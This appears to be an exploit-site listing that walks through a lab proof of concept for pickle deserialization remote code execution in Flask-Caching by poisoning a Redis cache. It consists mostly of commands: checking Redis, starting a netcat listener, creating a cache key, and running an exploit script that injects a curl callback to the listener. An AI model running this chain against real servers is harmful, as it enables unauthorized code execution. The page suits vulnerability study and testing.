Share
## https://sploitus.com/exploit?id=FB7F4DA4-34A7-58CD-945D-6210A6F69011
Pickle Serialization Remote Code Execution - Redis Poisoning PoC Exploit
--------------------------------------------------
Check redis server up and running
redis-cli -h 127.0.0.1 -p 6379 ping
redis-cli keys *
redis-cli get [Keyid]
-------------------------
Start listening netcat at port 10001 :
nc -nvlp 10001
-------------------------
Setting environments for Flask Chache
python -m venv venv_flask_cache_<lib_ver>
source venv_flask_cache_<lib_ver>\scripts\activate
pip install -r <requirement.txt>
Setting environments for Flask Chache 2.3.0
Run Flask App and create cache Key :
flask run
curl --header "Content-Type: application/json" --request POST --data {\"key\":\"Cachelib_2.3\"} http://localhost:5000/cache/new
Get the cache key value from Flask App
curl --request GET http://localhost:5000/cache/[key]
Exploiting Flask Cache by poisoning Redis Cache :
cve-2021-33026_PoC.py --rhost 127.0.0.1 --rport 5000 --cacheType redis --cmd "curl http://localhost:10001" --id 41685a90-434e-4d70-9a08-35b78025e09a